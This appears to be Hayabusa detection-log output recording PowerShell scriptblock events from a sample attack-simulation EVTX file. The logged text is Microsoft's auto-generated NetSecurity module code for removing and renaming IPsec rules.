[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] 